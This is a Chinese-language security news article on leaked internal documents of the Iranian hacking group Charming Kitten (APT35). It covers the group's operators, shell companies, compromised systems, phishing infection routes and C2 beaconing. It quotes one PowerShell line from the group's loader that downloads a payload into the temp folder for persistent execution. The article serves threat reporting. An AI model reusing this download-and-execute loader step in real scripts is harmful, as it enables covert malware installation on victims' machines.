Mimicat组织数据泄露详情：核心成员、空壳公司与千台受控系统曝光

安全研究员 Nariman Gharib 表示，泄露文件中的任务清单揭示，"迷人小猫"（Charming Kitten）的恶意软件主要瞄准外交、能源与民间社会组织网络。

据披露，以伊朗为背景的黑客组织"迷人小猫"（又称 APT35）近期泄露的内部文件，曝光了该组织核心成员、用于掩护的空壳公司以及遍布五大洲的数千台受控系统。

长期网络间谍行动体系

文件显示，隶属于伊朗伊斯兰革命卫队情报组织的第40部门，长期开展结合网络间谍、监控与目标定位的综合入侵行动。被盗的仪表盘数据和工资记录首次将具体黑客活动与实名操作人员关联，而不再是以往匿名的威胁标签。

泄露资料进一步揭示了支撑这些行动的财务体系，包括"姐妹团队"和"兄弟团队"的工资单，以及通过伪装成普通IT或云服务供应商的空壳公司流转的资金。受控系统涉及VPN网关、邮件服务器以及用于操纵已植入政府机构、高校和电信供应商内部的恶意软件的C2节点，完整呈现了资金流、管理链与恶意软件的三位一体运作模式。

攻击目标与感染途径

安全研究员 Nariman Gharib 指出，泄露材料中包含的任务清单表明，"迷人小猫"的恶意软件专门针对外交、能源和公民社会网络。攻击通常通过鱼叉式钓鱼邮件、伪造登录页面或伪装成会议邀请/工资单/政策文件的恶意文档附件传播。

当用户打开诱饵文件并启用脚本或输入凭证后，攻击者便获得初始立足点，最终实现设备完全控制与数据窃取。泄露的仪表盘日志显示，受害者主机的信标会通过HTTPS定期回连伊朗控制的服务器，这些通信往往隐藏在看似正常的网络流量中。

这些受控主机包括邮件网关、域控制器和用户笔记本电脑，使攻击者能访问邮件系统、文件共享和身份认证系统。泄露报告按地区和行业分类的感染机器集群，凸显了该行动的广泛影响。

感染机制与C2架构

感染通常始于用户打开宏或HTML诱饵后，在内存运行的小型加载器。简短的PowerShell命令会从固定但隐藏的URL获取主载荷，相关技术细节已在"迷人小猫"工具的完整分析报告中披露：

Invoke-WebRequest $u -OutFile "$env:TEMP\\\\svc.exe"

泄露日志显示，该二进制文件会作为计划任务持续运行，在伪装成正常Windows活动的同时维持稳定访问。